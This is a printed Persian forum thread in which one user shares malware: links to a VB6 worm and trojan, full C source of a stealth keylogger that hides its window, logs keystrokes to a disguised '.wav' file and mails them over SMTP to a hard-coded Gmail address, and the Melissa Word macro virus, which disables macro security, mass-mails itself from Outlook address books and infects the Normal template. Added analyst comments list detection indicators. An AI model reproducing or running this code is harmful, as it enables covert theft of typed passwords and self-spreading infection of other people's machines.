Parsi Coders
Source Code Virus & Worm - نسخه قابل چاپ




Source Code Virus & Worm - Amin_Mansouri - 05-22-2011

Source code of the "New Folder" worm. Listed behaviours:
Creates an Autorun.inf
Disables Task Manager
Disables "Show hidden files"
Closes the NOD32 setup
Copies the worm (memory or hard disk)
Written in Visual Basic 6
Download:
http://up.iranblog.com/images/qwtk6rodgqxbbmorkk3.rar
source code Trojan Full Source Code (Visual Basic 6)
سورس کد تروجان کامل تروجان
لینک دانلود :
http://irchat.hpage.com/get_file.php?id=1173514&vnr=651791


RE: Source Code Virus & Worm - Amin_Mansouri - 05-22-2011

به دلیل مشکل فنی تایپک پاک شد و دوباره ایجاد شد .
با عرض پوزش


RE: Source Code Virus & Worm - Amin_Mansouri - 05-23-2011

An article on developing hook based key loggers and hook safe software
Download :
http://irchat.hpage.com/get_file.php?id=1174509&vnr=795755


RE: Source Code Virus & Worm - Amin_Mansouri - 05-23-2011

[Source-Code] Create your own keylogger!

کد:
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
*                                       *
* File: keymail.c  Ver. 0.7                         *
*                                       *
* Purpose: a stealth (somewhat) key logger, writes to a log file then sends  *
* an email to whoever is set in the #define options at compile time.      *
* This code is for educational uses, don't be an ass hat with it.       *
* White Scorpion (www.white-scorpion.nl) did the initial work on the key   *
* logger, but he has gone on to bigger and better things.           *
* This version was crafted by Irongeek (www.Irongeek.com), who tacked on   *
* some code to make it send emails, along with a few other changes.      *
* If some of the code is crappy, blame Irongeek and not White Scorpion.    *
* Please send Irongeek improvements and he will post the changes and give you *
* credit for your contributions.                       *
*                                       *
* This program is free software; you can redistribute it and/or        *
* modify it under the terms of the GNU General Public License         *
* as published by the Free Software Foundation; either version 2       *
* of the License, or (at your option) any later version.           *
*                                       *
* This program is distributed in the hope that it will be useful,       *
* but WITHOUT ANY WARRANTY; without even the implied warranty of       *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the        *
* GNU General Public License for more details.                *
*                                       *
* You should have received a copy of the GNU General Public License      *
* along with this program; if not, write to the Free Software         *
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
*                                       *
* Change log:                                 *
*   1/3/06 On Ed Rguyl's recommendation I changed how malloc was used.   *
*   6/22/06 Added the date and time functionality using ctime and fixed   *
*       a bug where subject was being defined twice.(ThVoidedLine)   *
*                                       *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
/*
Compile notes: I used Dev-C++ 4.9.9.2 to compile this. If you get an error like:
    [Linker error] undefined reference to `WSAStartup@8'
Add this:
     -lws2_32
to Tools->Compiler Options under the section on compile flags.
*/

#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>
#include <time.h>
/* Forward declaration of the SMTP sender defined later in this listing. */
int MailIt (char *mailserver, char *emailto, char *emailfrom,
char *emailsubject, char *emailmessage);
/* BUFSIZE is not referenced anywhere in the visible listing. */
#define BUFSIZE 800
/* Value passed to sleep() between the SMTP commands in MailIt. */
#define waittime 500
/*If you don't know the mail exchange server for an address for the following
"nslookup -querytype=mx gmail.com" but replace gmail.com with the domain for
whatever email address you want. YOU MUST CHANGE THESE SETTINGS OR
IT WILL NOT WORK!!! */
/* Analyst note: the destination host and both addresses are compile-time
   string constants, so they appear as plain strings in a build of this file. */
#define cmailserver "gmail-smtp-in.l.google.com"
#define cemailto "irong33k@gmail.com"
#define cemailfrom "irong33k@gmail.com"
/* Size threshold in bytes: get_keys compares the log length reported by
   ftell() against this value and calls MailIt once it is reached. */
#define LogLength 100
/* Analyst note: both output files carry a .wav extension although only text is
   written to them (key log in FileName, SMTP transcript in SMTPLog). They are
   opened by bare name, i.e. relative to the process's current directory. A
   ".wav" file that grows a few bytes at a time and holds readable text is a
   useful host-side indicator for this sample. */
#define FileName "sound.wav"
#define SMTPLog "ring.wav"
#define cemailsubject "Logged"

/* Declared but not defined in the visible listing. main() calls get_keys(),
   which has no prototype ahead of its first use. */
int test_key(void);
/*
 * Entry point: hides the console window, appends a "Started logging"
 * timestamp to the log file, then runs get_keys() and returns its result.
 *
 * Analyst note: the behaviours visible here are a console allocated and
 * immediately hidden (ShowWindow with 0, i.e. SW_HIDE, on a window of class
 * "ConsoleWindowClass") and an append to FileName at start-up. A console
 * process with no visible window that writes to a data file in its working
 * directory is the pattern to look for on the host.
 */
int main(void)
{
  //NOTE(review): the original comment said to uncomment the lines below for
  //stealth mode, but in this listing they are already active.
  HWND stealth; /*creating stealth */
  AllocConsole();
  stealth=FindWindowA("ConsoleWindowClass",NULL);
  ShowWindow(stealth,0);
  
  //Append the start marker and the current local time (ctime adds the newline).
  {FILE *file;
  file=fopen(FileName,"a+");
  time_t theTime=time(0);
  fputs("\nStarted logging: ", file);
  fputs(ctime(&theTime),file);
  fclose(file);
  }
  
  //The block below is commented out in the listing; test, create and
  //create_key are not defined anywhere in the visible code.
  /* if (test==2)
  {//the path in which the file needs to be
  char *path="c:\\%windir%\\svchost.exe";
  create=create_key(path);    
  } */
  
  //get_keys() is defined after main and is called here without a prototype.
  int t=get_keys();  
  return t;
}

/*
 * Polling loop of the sample: sweeps virtual-key codes 8..222 with
 * GetAsyncKeyState, appends a text representation of each detected key to
 * FileName, and after every sweep checks the log size; once the log holds at
 * least LogLength bytes its contents are handed to MailIt and the log is
 * truncated by reopening it in "w" mode.
 *
 * Returns 1 when the log cannot be opened inside the loop. The while(1) has no
 * other exit (the break statements leave only the for loop or the switch), so
 * the final return EXIT_SUCCESS is never reached.
 *
 * Analyst note: what this produces on a host is (a) a process calling
 * GetAsyncKeyState for the whole key range at a short fixed interval and
 * (b) one fopen/append/fclose cycle on the log file per detected key, followed
 * by a periodic read and truncate of the same file. API-call monitoring for
 * high-rate GetAsyncKeyState polling from a windowless process, together with
 * the file pattern, is the natural detection point.
 */
int get_keys(void)
{
int freadindex;
char *buf;
long len;
FILE *file;
/* This outer handle is shadowed by the inner declarations of `file` below. */
file=fopen(FileName,"a+");


      short character;
       while(1)
       {
          /* Lower-case sleep(), not Win32 Sleep(); which function this resolves
             to depends on the toolchain - TODO confirm for Dev-C++/MinGW. */
          sleep(10);/*to prevent 100% cpu usage*/
          for(character=8;character<=222;character++)
          {
            /* -32767 is 0x8001 as a SHORT: key currently down and pressed
               since the previous GetAsyncKeyState call. */
            if(GetAsyncKeyState(character)==-32767)
            {
              FILE *file;
              file=fopen(FileName,"a+");
              if(file==NULL)
              {
                  return 1;
              }      
              if(file!=NULL)
              {    
                  /* Codes 39..64 are written as the raw byte value. */
                  if((character>=39)&&(character<=64))
                  {
                     fputc(character,file);
                     fclose(file);
                     break;
                  }    
                  /* Codes 65..90 (letters) are always stored lower-case; the
                     shift state is recorded separately as a [SHIFT] marker. */
                  else if((character>64)&&(character<91))
                  {
                     character+=32;
                     fputc(character,file);
                     fclose(file);
                     break;
                  }
                  else
                  {
                    /* Remaining keys are written either as a single character
                       or as a bracketed marker on its own line; anything not
                       listed is dropped by the default case. */
                    switch(character)
                    {
                       case VK_SPACE:
                       fputc(' ',file);
                       fclose(file);
                       break;  
                       case VK_SHIFT:
                       fputs("\r\n[SHIFT]\r\n",file);
                       fclose(file);
                       break;                      
                       case VK_RETURN:
                       fputs("\r\n[ENTER]\r\n",file);
                       fclose(file);
                       break;
                       case VK_BACK:
                       fputs("\r\n[BACKSPACE]\r\n",file);
                       fclose(file);
                       break;
                       case VK_TAB:
                       fputs("\r\n[TAB]\r\n",file);
                       fclose(file);
                       break;
                       case VK_CONTROL:
                       fputs("\r\n[CTRL]\r\n",file);
                       fclose(file);
                       break;  
                       case VK_DELETE:
                       fputs("\r\n[DEL]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_1:
                       fputs("\r\n[;:]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_2:
                       fputs("\r\n[/?]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_3:
                       fputs("\r\n[`~]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_4:
                       fputs("\r\n[ [{ ]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_5:
                       fputs("\r\n[\\|]\r\n",file);
                       fclose(file);
                       break;                
                       case VK_OEM_6:
                       fputs("\r\n[ ]} ]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_7:
                       fputs("\r\n['\"]\r\n",file);
                       fclose(file);
                       break;
                       case 187:
                       fputc('+',file);
                       fclose(file);
                       break;
                       case 188:
                       fputc(',',file);
                       fclose(file);
                       break;
                       case 189:
                       fputc('-',file);
                       fclose(file);
                       break;
                       case 190:
                       fputc('.',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD0:
                       fputc('0',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD1:
                       fputc('1',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD2:
                       fputc('2',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD3:
                       fputc('3',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD4:
                       fputc('4',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD5:
                       fputc('5',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD6:
                       fputc('6',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD7:
                       fputc('7',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD8:
                       fputc('8',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD9:
                       fputc('9',file);
                       fclose(file);
                       break;
                       case VK_CAPITAL:
                       fputs("\r\n[CAPS LOCK]\r\n",file);
                       fclose(file);
                       break;
                       default:
                       fclose(file);
                       break;
                    }    
                 }  
               }    
          }  
        }        
      /* After each sweep: measure the log and, once it reaches LogLength
         bytes, read it whole and pass it to MailIt as the message body. */
      FILE *file;
      file=fopen(FileName,"rb");
      fseek(file,0,SEEK_END); //go to end
      len=ftell(file); //get position at end (length)
      if(len>=LogLength) {
       fseek(file,0,SEEK_SET);//go to beg.
       buf=(char *)malloc(len);//malloc buffer
       freadindex=fread(buf,1,len,file);//read into buffer
       buf[freadindex] = '\0';//terminator stored at index freadindex so buf can be used as a string
       MailIt( cmailserver, cemailto, cemailfrom, cemailsubject, buf);
       fclose(file);
       /* Reopening in "w" mode empties the log after it has been sent. */
       file=fopen(FileName,"w");            
       }
      
      fclose(file);
      /* free() is commented out in the listing, so the buffer of every mailed
         batch stays allocated for the life of the process. */
      //free (buf);
        
      }
      return EXIT_SUCCESS;              
}

/*
 * Sends one plain-text message over SMTP: resolves mailserver with
 * gethostbyname, connects to TCP port 25, and issues helo / MAIL FROM /
 * RCPT TO / DATA / quit, sleeping waittime between steps. Every command sent
 * and every server reply received is appended to the SMTPLog file.
 *
 * Returns -1 when WSAStartup fails; a failed lookup, socket() or connect()
 * calls exit(1), which ends the whole process rather than just this call.
 *
 * NOTE(review): the listing is cut off on the page after the #else branch
 * below - no #endif, return statement or closing brace is shown.
 * NOTE(review): none of the buffer writes in this function are length-checked;
 * treat the sample as unstable when running it in an analysis sandbox.
 *
 * Analyst note: on the network this is an unauthenticated, unencrypted SMTP
 * session from an end-user machine straight to a mail exchanger on port 25,
 * with the fixed greeting "helo me.somepalace.com" and the subject configured
 * in cemailsubject. Blocking outbound port 25 from workstations (mail only via
 * the organisation's relay) stops this delivery path, and the greeting string
 * is a usable signature for this unmodified source. On the host, the full
 * SMTP transcript, including the mailed log text, is left in SMTPLog.
 */
int MailIt (char *mailserver, char *emailto, char *emailfrom,
char *emailsubject, char *emailmessage) {
  SOCKET sockfd;
  WSADATA wsaData;
  FILE *smtpfile;
  
  #define bufsize 300
  int bytes_sent;  /* return value of send(); assigned but never checked */
  int err;
  struct hostent *host;  /* info from gethostbyname */
  struct sockaddr_in dest_addr;  /* Host Address */
  char line[1000];
  char *Rec_Buf = (char*) malloc(bufsize+1);
  smtpfile=fopen(SMTPLog,"a+");
  if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) {
   fputs("WSAStartup failed",smtpfile);
   WSACleanup();
   return -1;
  }
  if ( (host=gethostbyname(mailserver)) == NULL) {
    perror("gethostbyname");
    exit(1);
  }
  memset(&dest_addr,0,sizeof(dest_addr));
  memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);

   /* Prepare dest_addr */
   dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */
   dest_addr.sin_port= htons(25); /* port is hard-coded here; no PORT macro exists in the listing */

   /* Get socket */

   if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
    perror("socket");
    exit(1);
    }
   /* Connect !*/
   fputs("Connecting....\n",smtpfile);

  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
    perror("connect");
    exit(1);
    }
   /* Server banner, then the greeting. Each step below follows the same
      shape: build the command in line, log it, send it, wait, read and log
      the reply. */
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   strcpy(line,"helo me.somepalace.com\n");
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   /* Envelope sender. */
   strcpy(line,"MAIL FROM:<");
   strncat(line,emailfrom,strlen(emailfrom));
   strncat(line,">\n",3);
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   /* Envelope recipient. */
   strcpy(line,"RCPT TO:<");
   strncat(line,emailto,strlen(emailto));
   strncat(line,">\n",3);
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   strcpy(line,"DATA\n");
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   sleep(waittime);
   /* Headers and body are assembled in line and sent as a single block; the
      same text is also written to SMTPLog, so the log content ends up in both
      files on disk. */
   strcpy(line,"To:");
   strcat(line,emailto);
   strcat(line,"\n");
   strcat(line,"From:");
   strcat(line,emailfrom);
   strcat(line,"\n");
   strcat(line,"Subject:");
   strcat(line,emailsubject);
   strcat(line,"\n");
   strcat(line,emailmessage);
   strcat(line,"\r\n.\r\n");
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   strcpy(line,"quit\n");
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   fclose(smtpfile);            
   #ifdef WIN32
   closesocket(sockfd);
   WSACleanup();
   #else
   close(sockfd);
   /* NOTE(review): the page ends the listing here; the rest of the function is not shown. */



RE: Source Code Virus & Worm - Amin_Mansouri - 06-25-2011


کد:
// Melissa Virus Source Code
  
' Word macro handler named Document_Open; per the comments near the end of the
' listing it targets Word 97 and Word 2000.
' NOTE(review): as shown on the page the registry paths read "Mic*ft" (the
' vendor name appears to have been filtered) and several long statements are
' wrapped across lines without continuation characters, so this text is a
' damaged copy rather than a loadable module.
'
' Analyst note - artefacts visible in this listing that a responder can look for:
'   - a VBA component named "Melissa" in the document or in the Normal template
'   - a value "Melissa?" = "... by Kwyjibo" written under the Office registry path
'   - the Word security "Level" value set to 1, and the Macro / Security...
'     menu entries disabled
'   - mail with the subject "Important Message From <user name>" carrying the
'     currently open document as attachment
' Keeping macros disabled for documents received by mail prevents the handler
' from running at all.
Private Sub Document_Open()
' Errors are suppressed for the whole routine.
On Error Resume Next
' Step 1: lower Word's macro protection. If a "Level" value exists, the
' Security... command is disabled and Level is set to 1; otherwise the Macro
' menu entry is disabled and three Options flags are set to (1 - 1), i.e. 0.
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Mic*ft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Mic*ft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
' Step 2: mailing. An Outlook automation object and its MAPI namespace are
' created; the registry marker "Melissa?" decides whether mailing has already
' been done for this user.
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Mic*ft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
     ' One message per address list; the inner loop stops adding recipients
     ' once x exceeds 50 by forcing the loop counter to its end value.
     For y = 1 To DasMapiName.AddressLists.Count
         Set AddyBook = DasMapiName.AddressLists(y)
         x = 1
         Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
         For oo = 1 To AddyBook.AddressEntries.Count
             Peep = AddyBook.AddressEntries(x)
             BreakUmOffASlice.Recipients.Add Peep
             x = x + 1
             If x > 50 Then oo = AddyBook.AddressEntries.Count
          Next oo
          BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
          BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else;-)"
          BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
          BreakUmOffASlice.Send
          Peep = ""
     Next y
DasMapiName.Logoff
End If
' The marker is written after the mailing step so it is skipped next time.
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Mic*ft\Office\",
"Melissa?") = "... by Kwyjibo"
End If
' Step 3: code copy between the active document and the Normal template.
' The first VBA component of each is inspected; one not yet named "Melissa"
' has its existing lines deleted, is renamed, and becomes the copy target.
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
' Nothing to copy when both components already carry the name.
If DoNT <> True And DoAD <> True Then GoTo CYA
' Template is the target: lines are copied from the document's module, and the
' copy is given a Document_Close header instead of Document_Open.
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
' Document is the target: lines are copied from the template's module under a
' Document_Open header.
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
' Step 4: save handling. The document is either saved under its own name or
' merely flagged as saved, depending on the line counts read above and on
' whether its name contains "Document".
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
' Visible payload: when the day of the month equals the current minute, the
' text below is typed into the open document.
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters.  Game's over.
I'm outta here."
End Sub